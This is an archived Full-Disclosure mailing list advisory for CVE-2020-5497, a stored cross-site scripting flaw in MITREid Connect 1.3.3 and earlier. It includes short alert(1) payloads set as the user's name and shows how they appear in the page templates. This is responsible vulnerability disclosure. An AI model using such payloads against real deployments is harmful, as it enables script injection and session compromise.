lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Fri, 21 Feb 2020 13:45:51 -0700 From: aaron bishop <abishop@...ux.com> To: fulldisclosure@...lists.org Subject: [FD] CVE-2020-5497 - MITREid Connect XSS MITREid Connect OpenID-Connect-Java-Spring-Server <https://github.com/mitreid-connect/OpenID-Connect-Java-Spring-Server> version 1.3.3 and earlier is vulnerable to Cross-Site Scripting; the users name is included in *topbar.tag* and *header.tag* without being sanitized. A user can set their name to a value like: Test</script><script>alert(1)</script> Which will be included in JSON used by a JavaScript function in *header.tag* : // get the info of the current user, if available (null otherwise) > function getUserInfo() { > return {"sub":"12318767","name":" > *Test</script><script>alert(1)</script>* > Test","preferred_username":"Test","given_name":"Test</script><script>alert(1)</script>","family_name":"Test","email":" > test@...t.com","email_verified":true};} A name such as: Test<script>alert(1)</script> would also work; it is included in the page when menus are created by *topbar.tag*: <!-- use a simplified user button system when collapsed --> > <ul class="nav hidden-desktop"> > <li><a href="manage/#user/profile">*Test<script>alert(1)</script>* > Test</a></li> > <li class="divider"></li> > <li><a href="" class="logoutLink"><i class="icon-remove"></i> Log > out</a></li> This issue has been reported on Github <https://github.com/mitreid-connect/OpenID-Connect-Java-Spring-Server/issues/1521> with patches pending. A write up is available at: https://www.securitymetrics.com/blog/MITREid-Connect-cross-site-scripting-CVE-2020-5497 _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists